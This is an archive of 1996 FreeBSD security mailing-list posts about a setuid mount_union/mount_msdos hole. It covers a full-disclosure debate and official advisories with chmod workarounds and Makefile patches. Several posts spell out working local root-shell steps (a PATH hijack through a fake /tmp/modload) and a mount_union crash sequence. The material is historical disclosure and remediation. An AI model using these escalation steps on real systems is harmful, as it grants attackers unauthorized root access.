freebsd-security@FreeBSD.org; Sat, 18 May 1996 00:17:48 +0200 Message-Id: <199605172217.AAA00505@sea.campus.luth.se> Subject: Re: very bad To: freebsd-security@FreeBSD.org Date: Sat, 18 May 1996 00:17:47 +0200 (MET DST) From: "Mikael Karpberg" In-Reply-To: <199605171621.KAA15772@natasha.scccc.com> from "Kevin J. Duling" at May 17, 96 10:21:57 am X-Mailer: ELM [version 2.4 PL25 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Hello! > > Hi, > > > > What IS very bad about this whole thing, isn't existance of this bug, > > as much as how easliy information about it can be obtained. Even if > > you do send patch along with info, there is still danger that someone, > > gets up earlier than root, and then ... (sweat dreams, root!) > > What might be a better solution is to announce that "There is a problem" > then provide the fix...but don't illustrate the problem. That way everyone > is immediately notified of the problem and a fix for it, but you don't have > a list of instructions for how to crack in. > > Personally, I prefer having the instructions, but it's not a good idea... > Exactly. I think too many here have been cheering on Chris for announcing the bug. Not that it was not a good thing he did, since it was allready out, on other lists. There is no such thing as a list where only "serious admins" will be on. First, it would probably have to be encrypted, or something. Second, it's not like a root is always a nice person. I'm a root on my private little machine on the campus net here, for example. Anyone on here with a PC is a root on a FreeBSD machine if he likes. A root could also just care for his system, and hack other peoples, trying to use their recourses, or whatever. In any case, they can mail from root on a machine and join the "secure list". Sending bugs you find ONLY to security-officer@freebsd.org enables him to fix a patch (quick one like the chmod in this case, or more drastic if needed) and mail to the list that there is a dangerous security hole and how to fix it. That way you can, if not stop, then at least slow down the guys that want to use the information to crack a system. And you still give the admins as much time to fix the hole as they get from a complete instruction on how to exploit it. Then, say two-three weeks later, you can post what the hole was about and what has been done, etc. Then we honest guys that are merely interested in the details for fun, still get to know them. The admins get a way to fix hole before crackers get to them though, and a safe list is not needed. Just my $0.02... /Mikael From owner-freebsd-security Fri May 17 15:34:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id PAA25205 for security-outgoing; Fri, 17 May 1996 15:34:14 -0700 (PDT) Received: from apocalypse.superlink.net (root@apocalypse.superlink.net [205.246.27.150]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id PAA25194 for ; Fri, 17 May 1996 15:34:08 -0700 (PDT) Received: (from marxx@localhost) by apocalypse.superlink.net (8.7.5/8.7.3) id OAA00874; Fri, 17 May 1996 14:43:35 -0400 (EDT) Date: Fri, 17 May 1996 14:43:34 -0400 (EDT) From: "Charles C. Figueiredo" To: security@freebsd.org Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-455475863-832358614=:856" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-455475863-832358614=:856 Content-Type: TEXT/PLAIN; charset=US-ASCII "I don't want to grow up, I'm a BSD kid. There's so many toys in /usr/bin that I can play with!" ------------------------------------------------------------------------------ Charles C. Figueiredo Marxx marxx@superlink.net ------------------------------------------------------------------------------ --0-455475863-832358614=:856 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="mount-bug.txt" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: DQoJRnJlZUJTRCBWRlMgTW9kdWxlIE1hbmFnZW1lbnQgcm91bnRpbmUgc2Vj dXJpdHkgcHJvYmxlbXMuIA0KDQoNCglUaGlzIGlzIGEgY2xhc3NpYyBleGFt cGxlIG9mIHBlb3BsZSBub3QgYmVpbmcgdmVyeSBzZWN1cml0eSBhd2FyZSB3 aGlsZSANCmNvZGluZy4gIFRoZSBwcm9ibGVtIGxpZXMgd2l0aCB0aGUgZmFj dCB0aGF0IGEgYml0IG9mIHNldHVpZCBjb2RlLCBpcyBleGVjdXRpbmcgDQp2 aXJ0dWFsIGZpbGUgc3lzdGVtIG1vZHVsZXMgaW4gYSB2ZXJ5IGluc2VjdXJl IG1hbm9yLiBUaGlzIGlzIGJleW9uZCBqdXN0IA0KbW91bnRfdW5pb24uDQoJ SGVyZSdzIHRoZSBjcml0aWNhbCBiaXQgb2YgbW91bnRfdW5pb246DQoNCi0t LS0tLS0tLShDdXQgSGVyZSktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t DQoNCiAgc3RydWN0IHZmc2NvbmYgKnZmYzsNCiAgdmZjID0gZ2V0dmZzYnlu YW1lKCJ1bmlvbiIpOw0KICBpZighdmZjICYmIHZmc2lzbG9hZGFibGUoInVu aW9uIikpIHsNCiAgICAgICAgICBpZih2ZnNsb2FkKCJ1bmlvbiIpKQ0KICAg ICAgICAgICAgICAgICAgZXJyKDEsICJ2ZnNsb2FkKHVuaW9uKSIpOw0KICAg ICAgICAgIGVuZHZmc2VudCgpOyAgICAvKiBmbHVzaCBjYWNoZSAqLw0KICAg ICAgICAgIHZmYyA9IGdldHZmc2J5bmFtZSgidW5pb24iKTsNCg0KLS0tLS0t LS0tLShDdXQgSGVyZSktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCgkN Cg0KCQ0KDQoJQW55IHNvZnR3YXJlLCB1c2luZyB2ZnMgcm91dGluZXMgbGlr ZSB0aGlzLCB3aGlsZSBzaW11bHRhbmVvdXNseSBiZWluZyANCnNldHVpZCwg cnVucyB0aGUgcmlzayBvZiB0aGVzZSBzaW1wbGUgSUZTLCAkUEFUSCwgYW5k IHN5c3RlbSgpIHR5cGUgaGFja3MuIA0KTWFuIGdldHZmc2J5bmFtZSgzKSwg YW5kIGJ5IGFsbCBtZWFucywgcmVhZCB0aGUgY29kZS5JJ2xsIGJldCBzb21l d2hlcmUgaW5zaWRlIA0KdGhlIHZmcyBtb2R1bGUgbWFuYWdlbWVudCByb3V0 aW5lcywgYW4gZXhlY2woKSBvciBleGVjdigpIGV4aXN0cyBmb3IgbW9kbG9h ZCwgDQpJIHBlcnBvc2UgdHdvIG9wdGlvbnM6DQoNCgkxIC0gbW91bnQgc2hv dWxkIG5vdCBjYWxsIHZmc2xvYWQoKSBpZiBnZXR1aWQoKSAhPSBnZXRldWlk KCkuDQoJMiAtIEZpeCB0aGUgd2F5IHZmcyByb3V0aW5lcyBkZXNpZ25hdGUg aGFyZGNvZGVkIGRpcmVjdG9yaWVzIGZvciBMS01zLg0KDQoJVGhlIGVudmly b25tZW50IHZhcmlhYmxlIExLTURJUiBtaWdodCBhbHNvIHByZXNlbnQgcHJv YmxlbXMgaW4gdGhlIA0KZnV0dXJlLg0KDQoNCglFeGFtcGxlIGV4cGxvaXRh dGlvbjoNCg0KYmxlYWgkIGV4cG9ydCBQQVRIPS90bXA6JFBBVEgNCmJsZWFo JCBlY2hvIC9iaW4vc2ggPi90bXAvbW9kbG9hZA0KYmxlYWgkIGNobW9kICt4 IC90bXAvbW9kbG9hZA0KYmxlYWgkIC9zYmluL21vdW50X3VuaW9uIC9mb28g L29vZg0KIyBpZA0KdWlkPTQxMyhtYXJ4eCkgZXVpZD0wKHJvb3QpIGdpZD0y MChzdGFmZikgZ3JvdXBzPTIwKHN0YWZmKQ0KIyBleGl0DQptb3VudF91bmlv bjogTm8gc3VjaCBmaWxlIG9yIGRpcmVjdG9yeQ0KYmxlYWgkDQoNCm5vdGU6 IFRoaXMgd29ya3Mgb24gYmFzaWNhbGx5IGFsbCBGcmVlQlNEIGRpc3RyaWJ1 dGlvbnMuDQo= --0-455475863-832358614=:856-- From owner-freebsd-security Fri May 17 16:00:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA27091 for security-outgoing; Fri, 17 May 1996 16:00:53 -0700 (PDT) Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA27085 for ; Fri, 17 May 1996 16:00:50 -0700 (PDT) Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id JAA07101; Sat, 18 May 1996 09:00:46 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id JAA15072; Sat, 18 May 1996 09:00:45 +1000 (EST) Message-Id: <199605172300.JAA15072@amethyst.auscert.org.au> X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol To: invalid opcode cc: Vladimir Jojic , freebsd-security@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 09:52:26 MST." Date: Sat, 18 May 1996 09:00:44 +1000 From: Danny Smith Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk invalid opcode writes: > On Fri, 17 May 1996, Danny Smith wrote: > > > Another unfortunate part is that it is approaching midnight in Australia > > (and it is now past midnight in New Zealand) at the start of the weekend. > > Posting vulnerbility information like this has not helped any system > > administrators if they are all home for the weekend. All it has done > > is increase the exposure of their systems to attack by more poeple. > > First off, I wouldn't have posted it had it been a secret little bug. But > it wasn't, it was already out on 2 mailing lists which probably have > close to 10,000 people on them, 50% of which are people who LOOK for > these types of bugs so they can login to their accounts running FreeBSD > and exploit it. At this point, the more exposure it gets, the more > root@vulnerablehost will hear about it and fix it. Again, the debate of full disclosure arises. I recognise that by mailing on this again, I am inflaming the situation. For the record, I am not against full disclosure, but it must be done correctly. Posting full "how to" instructions late on a Friday night is not the "correct" way to do it. I accept that the information was available elsewhere initially. The problem more lay in the original posting to the first list, rather than the last. I am not pointing fingers, since the information is out now and the community must deal with that. As suggested by others, once a suitable workaround can be developed, then simply an acknowledgement of the problem and a supplied workaround *at the same time* would suffice. There is so much security information available that it is difficult to know what is real, what is false, and what will correctly fix the problem. Everyone has an opinion. Posting a notice like "There is a hole in FreeBSD. Make /bin/sh SUID to fix the current problem" is obviously false information. Other subtle code fixes presented to groups may contain either malicious fixes, or may introduce further problems. How is the poor system administrator supposed to "know" what is correct and what isn't? (the fix to this problem obviously solves the problem - what does it break though?) The other situation of "FreeBSD 2.1.0 is affected - I don't care about anything else" is really just a selfish attitude. How many other releases are affected? What about other versions of BSD? Are there any other related programs? Is it better to fix the code, workaround the problem, disable the service? What will I break? These questions really need answers before alerting the wider community with full "how to" instructions. It is unfortunate that there are system administators that are not as talented as many of the readers on this list. They need explicit instructions for closing holes, and for binary-only operating systems, these must often come from the vendor. Many people choose to use FreeBSD and similar simply because you get the source code. So long as you are able to use the source code, then you are way ahead of the rest. Most are not in this enviable position though. Enough of my wasting your time. Again, I apologise for inflaming the situation. If anyone wants to continue this discussion off-line from the mailing list, then I am happy to have a "sensible, mature" discussion of some of the issues. Danny Smith. ========================================================================== Danny Smith | Fax: +61 7 3365 4477 AUSCERT | Phone: +61 7 3365 4417 c/- Prentice Centre | (answered during business hours) The University of Queensland | (on call after hours for emergencies) Qld. 4072. Australia | Internet: auscert@auscert.org.au Standard Disclaimer: My opinions do not necessarily reflect the policy of AUSCERT or The University of Queensland. From owner-freebsd-security Fri May 17 16:27:31 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA29140 for security-outgoing; Fri, 17 May 1996 16:27:31 -0700 (PDT) Received: from sasami.jurai.net (root@sasami.jurai.net [206.151.208.162]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA29134 for ; Fri, 17 May 1996 16:27:29 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.7.4/8.7.3) with SMTP id SAA09654; Fri, 17 May 1996 18:27:17 -0500 (CDT) Date: Fri, 17 May 1996 18:27:17 -0500 (CDT) From: "Matthew N. Dodd" X-Sender: winter@sasami To: "Kevin J. Duling" cc: freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: <199605171621.KAA15772@natasha.scccc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Kevin J. Duling wrote: > What might be a better solution is to announce that "There is a problem" > then provide the fix...but don't illustrate the problem. That way everyone > is immediately notified of the problem and a fix for it, but you don't have > a list of instructions for how to crack in. > Personally, I prefer having the instructions, but it's not a good idea... Sorry, if a problem is to be taken seriously then it must present um... 'clear and present danger'. I saw the exploit and went "sh*t! this is bad." I had all my machines fixed a minute later and then went poking around and crashed my test box trying out the exploit. If you get the whole of the problem out, and FORCE it to be a problem then you won't have to worry about people brushing it off. If they get burned, then they have only themselves to blame for not taking the problem seriously and fixing it. I'm not worried about any of my users exploiting these bugs, as I've no qualms about feeding them to legal and letting them play with those guys. Full disclosure, with exploits please. | Matthew N. Dodd | winter@jurai.net | http://www.jurai.net/~winter | | Technical Manager | mdodd@intersurf.net | http://www.intersurf.net | | InterSurf Online | "Welcome to the net Sir, would you like a handbasket?"| From owner-freebsd-security Fri May 17 16:30:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA29459 for security-outgoing; Fri, 17 May 1996 16:30:57 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA29443; Fri, 17 May 1996 16:30:51 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id QAA02390; Fri, 17 May 1996 16:30:52 -0700 (PDT) Message-Id: <199605172330.QAA02390@precipice.shockwave.com> To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org cc: freebsd-security@freebsd.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:09.vfsload Date: Fri, 17 May 1996 16:30:52 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:09 Security Advisory The FreeBSD Project, Inc. Topic: unauthorized access via mount_union / mount_msdos (vfsload) Category: core Module: libc Announced: 1996-05-17 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: 1996-05-17 2.1-stable and 2.2-current sources Source: FreeBSD native bug FreeBSD only: yes Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:09/ ============================================================================= I. Background A bug was found in the vfsload(3) library call that affects all versions of FreeBSD from 2.0 through 2.2-CURRENT that caused a system vulnerability. This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18. The FreeBSD project is aware of active exploits of this vulnerability. All FreeBSD users are encouraged to use the workaround provided until they can update their operating system to a version with this vulnerability fixed. II. Problem Description The mount_union and mount_msdos programs invoke another system utility in an insecure fashion while setuid root. III. Impact The problem could allow local users to gain unauthorized permissions. This vulnerability can only be exploited by users with a valid account on the local system. IV. Solution(s) Update operating system sources and binaries to FreeBSD 2.1-stable or FreeBSD 2.2-current as distributed later than 1996-05-18 or if you are currently running 2.1 or later, you may apply the solution patches available at the URL listed at the top of this message. The OS updates fix the actual problem in the vfsload(3) library routine. Once the vfsload() library routine is fixed, the workaround listed below is not necessary to solve this problem. However, an additional stability problem has come to light (ref. FreeBSD SA-96:10) so the FreeBSD project suggests using both the setuid workaround and the solution for best results. V. Workaround This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union and mount_msdos program. This workaround will work for all versions of FreeBSD affected by this problem. As root, execute the command: % chmod u-s /sbin/mount_union /sbin/mount_msdos then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union /sbin/mount_msdos -r-xr-xr-x 1 root bin 151552 Apr 26 04:41 /sbin/mount_msdos -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ---- *** /usr/src/sbin/i386/mount_msdos/Makefile Sun Dec 4 00:01:24 1994 - --- /usr/src/sbin/i386/mount_msdos/Makefile Fri May 17 11:31:57 1996 *************** *** 6,14 **** SRCS= mount_msdos.c getmntopts.c MAN8= mount_msdos.8 - - BINOWN= root - - BINMODE= 4555 - - MOUNT= ${.CURDIR}/../../mount CFLAGS+= -I${MOUNT} .PATH: ${MOUNT} - --- 6,11 ---- ============================================================================= The FreeBSD Project, Inc. Web Site: http://www.freebsd.com/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMZ0Fz1UuHi5z0oilAQFAjQQAgiZcuB/l7nS18BhaFNayfI4ergVd2KAy Va+hrzVvQ/AzC4Jdm5xY/86muOxf4ZgIT/gu1217Jwd/Lt+6CuP0FKYX8Bw1ml9x I9x9G3bII80OrGdrJKsgvTszaPhHJxEoAwAOFB8huA+mL9hyIGDlOBumWnvEPzVh nHd155oPg6k= =TPYT -----END PGP SIGNATURE----- From owner-freebsd-security Fri May 17 16:35:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA00107 for security-outgoing; Fri, 17 May 1996 16:35:40 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA29997; Fri, 17 May 1996 16:35:33 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id QAA02421; Fri, 17 May 1996 16:35:40 -0700 (PDT) Message-Id: <199605172335.QAA02421@precipice.shockwave.com> To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org cc: security@freebsd.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:10.mount_union Date: Fri, 17 May 1996 16:35:40 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is the second of two related security advisory notices. -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:10 Security Advisory The FreeBSD Project, Inc. Topic: system stability compromise via mount_union program Category: core Module: unionfs Announced: 1996-05-17 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: (workaround) 2.1-stable and 2.2-current as of 1996-05-17 Source: 4.4BSD (lite) FreeBSD only: no Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:10/ ============================================================================= I. Background A bug was found in the union file system code which can allow an unprivileged local user to compromise system stability. This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18. All FreeBSD users are encouraged to use the workaround provided until the FreeBSD Project distributes a full solution. II. Problem Description The union filesystem code had problems with certain mount ordering problems. By executing a certain sequence of mount_union commands, an unprivileged local user may cause a system reload. NOTE: This is a different problem than the one discussed in FreeBSD SA-96:09. The workaround for this vulnerability is similar to the one discussed in 96:09, but the proper solution for the unauthorized access problem in 96:09 does not address this vulnerability. III. Impact The problem could allow local users to compromise system stability. This vulnerability can only be exploited by users with a valid account on the local system. IV. Solution(s) The FreeBSD project is currently developing a solution to this problem, however the proper solution will not be available until a future FreeBSD release. We do not anticipate releasing patches for previous versions of FreeBSD due to the extensive nature of this fix. This security advisory will be updated as new information is made available. V. Workaround This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union program. This workaround will work for all versions of FreeBSD affected by this problem. As root, execute the command: % chmod u-s /sbin/mount_union then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ---- ============================================================================= The FreeBSD Project, Inc. Web Site: http://www.freebsd.com/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMZ0F01UuHi5z0oilAQGkkwP+K9KvfKokYwpfhdUBR1c9nitAHGFMl2db rzD3pl8E82fB6sluXZ8cpDToGgvN5I7bM5lEXeXOPhfIplYVihsJeWUjVPhbF20q pgfcINcYuSLcG0cLRd+ZxZjVbtC21yU44aHOEOiWMb7X79E8y9UKOVkkGcDllt0T ckaAX8totZY= =5/DV -----END PGP SIGNATURE----- From owner-freebsd-security Fri May 17 16:45:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA01126 for security-outgoing; Fri, 17 May 1996 16:45:35 -0700 (PDT) Received: from io.org (io.org [198.133.36.1]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA01121 for ; Fri, 17 May 1996 16:45:33 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by io.org (8.6.12/8.6.12) with SMTP id TAA14734 for ; Fri, 17 May 1996 19:45:27 -0400 Date: Fri, 17 May 1996 19:44:25 -0400 (EDT) From: Brian Tao To: FREEBSD-SECURITY-L Subject: SECURITY BUG in FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Here's the same bug reported by someone else on the -hackers list, with both the kernel panic and root shell exploits. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" ---------- Forwarded message ---------- Date: Fri, 17 May 1996 19:06:03 -0400 (EDT) From: Dan Polivy To: freebsd-hackers@freebsd.org Subject: SECURITY BUG in FreeBSD (fwd) I came across this in my travels...thought you guys may be interesting (in case you didn't already know)...It's worked for me on my -RELEASE, and -STABLE machines...dunno about any others... Dan +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | JRI HIS MIS Systems Administrator/Tech Support | |////////////////////////////////////////////////////////////////| | danp@busstop.org dpolivy@jri.org danp@library.pride.net | |\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| | Check out JRI's Homepage at http://www.jri.org | |////////////////////////////////////////////////////////////////| | EMail health@jri.org or check out http://www.jri.org/jrihealth | +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ --------------------------------- Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL ---------------------------------- From owner-freebsd-security Fri May 17 17:04:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA02938 for security-outgoing; Fri, 17 May 1996 17:04:43 -0700 (PDT) Received: from shell.aros.net (root@shell.aros.net [205.164.111.19]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id RAA02927; Fri, 17 May 1996 17:04:40 -0700 (PDT) Received: (from angio@localhost) by shell.aros.net (8.7.5/Unknown) id SAA01785; Fri, 17 May 1996 18:04:25 -0600 (MDT) From: Dave Andersen Message-Id: <199605180004.SAA01785@shell.aros.net> Subject: Re: very bad (fwd) To: jkh@time.cdrom.com Date: Fri, 17 May 1996 18:04:25 -0600 (MDT) Cc: freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, angio@aros.net X-Mailer: ELM [version 2.4ME+ PL13 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Since it's already out, I'm CC:'ing this to the general list. chmod u-s /sbin/mount_union is *not* a complete fix. The mount_msdos command is similarly vulnerable: bash$ export PATH=/tmp:$PATH bash$ whoami angio bash$ mount_msdos /asdf /tmp # whoami root The only difference in this is that mount_msdos checks to see if the mount point exists before it tries to mount it. My suggestion: chmod ug-s /sbin/mount_* -Dave Andersen ----- Forwarded message from invalid opcode ----- Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( And I would have sent it to security-officer@freebsd.org had I even known of such an address. The prepared fix is chmod u-s /sbin/mount_union. == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ----- End of forwarded message from invalid opcode ----- -- angio@aros.net Complete virtual hosting and business-oriented system administration Internet services. (WWW, FTP, email) http://www.aros.net/ http://www.aros.net/about/virtual "There are only two industries that refer to thier customers as 'users'." From owner-freebsd-security Fri May 17 17:07:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03173 for security-outgoing; Fri, 17 May 1996 17:07:46 -0700 (PDT) Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03132; Fri, 17 May 1996 17:06:53 -0700 (PDT) Message-Id: <199605180006.RAA03132@freefall.freebsd.org> To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org cc: freebsd-security@freebsd.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:09.vfsload Date: Fri, 17 May 1996 16:30:52 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:09 Security Advisory The FreeBSD Project, Inc. Topic: unauthorized access via mount_union / mount_msdos (vfsload) Category: core Module: libc Announced: 1996-05-17 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: 1996-05-17 2.1-stable and 2.2-current sources Source: FreeBSD native bug FreeBSD only: yes Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:09/ ============================================================================= I. Background A bug was found in the vfsload(3) library call that affects all versions of FreeBSD from 2.0 through 2.2-CURRENT that caused a system vulnerability. This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18. The FreeBSD project is aware of active exploits of this vulnerability. All FreeBSD users are encouraged to use the workaround provided until they can update their operating system to a version with this vulnerability fixed. II. Problem Description The mount_union and mount_msdos programs invoke another system utility in an insecure fashion while setuid root. III. Impact The problem could allow local users to gain unauthorized permissions. This vulnerability can only be exploited by users with a valid account on the local system. IV. Solution(s) Update operating system sources and binaries to FreeBSD 2.1-stable or FreeBSD 2.2-current as distributed later than 1996-05-18 or if you are currently running 2.1 or later, you may apply the solution patches available at the URL listed at the top of this message. The OS updates fix the actual problem in the vfsload(3) library routine. Once the vfsload() library routine is fixed, the workaround listed below is not necessary to solve this problem. However, an additional stability problem has come to light (ref. FreeBSD SA-96:10) so the FreeBSD project suggests using both the setuid workaround and the solution for best results. V. Workaround This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union and mount_msdos program. This workaround will work for all versions of FreeBSD affected by this problem. As root, execute the command: % chmod u-s /sbin/mount_union /sbin/mount_msdos then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union /sbin/mount_msdos -r-xr-xr-x 1 root bin 151552 Apr 26 04:41 /sbin/mount_msdos -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ---- *** /usr/src/sbin/i386/mount_msdos/Makefile Sun Dec 4 00:01:24 1994 - --- /usr/src/sbin/i386/mount_msdos/Makefile Fri May 17 11:31:57 1996 *************** *** 6,14 **** SRCS= mount_msdos.c getmntopts.c MAN8= mount_msdos.8 - - BINOWN= root - - BINMODE= 4555 - - MOUNT= ${.CURDIR}/../../mount CFLAGS+= -I${MOUNT} .PATH: ${MOUNT} - --- 6,11 ---- ============================================================================= The FreeBSD 